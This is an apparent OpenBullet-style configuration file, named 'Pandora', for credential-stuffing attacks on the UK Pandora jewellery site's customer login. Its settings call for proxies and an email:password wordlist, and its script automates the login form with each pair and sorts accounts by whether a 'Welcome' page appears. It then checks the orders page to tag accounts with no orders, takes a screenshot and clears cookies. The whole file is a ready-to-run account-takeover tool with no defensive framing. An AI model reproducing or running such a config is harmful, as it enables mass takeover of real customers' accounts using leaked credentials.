[SETTINGS]
{
  "Name": "Pandora",
  "SuggestedBots": 6,
  "LastModified": "2018-08-20T18:40:02.0000754+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
BROWSERACTION Open "" 
NAVIGATE "https://uk.pandora.net/en/club" 60 
#TYPE_USERNAME ELEMENTACTION XPath "//*[@id=\"gigya-login-form\"]/div[2]/div[1]/div[2]/input" 
  SendKeys "<USER>" -> VAR "" 
#TYPE_PASSWORD ELEMENTACTION XPath "//*[@id=\"gigya-login-form\"]/div[2]/div[1]/div[3]/input" 
  SendKeys "<PASS>" -> VAR "" 
#LOGIN ELEMENTACTION XPath "//*[@id=\"gigya-login-form\"]/div[2]/div[1]/div[5]/input" 
  Click "" -> VAR "" 
NAVIGATE "https://uk.pandora.net/en/club" 60 
FUNCTION Delay "6000" -> VAR "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Welcome" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "Welcome" 
NAVIGATE "https://uk.pandora.net/en/My-Orders" 60 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "You have not placed any orders as yet" 
BROWSERACTION Screenshot "" 
BROWSERACTION ClearCookies "" 
BROWSERACTION Quit "" 
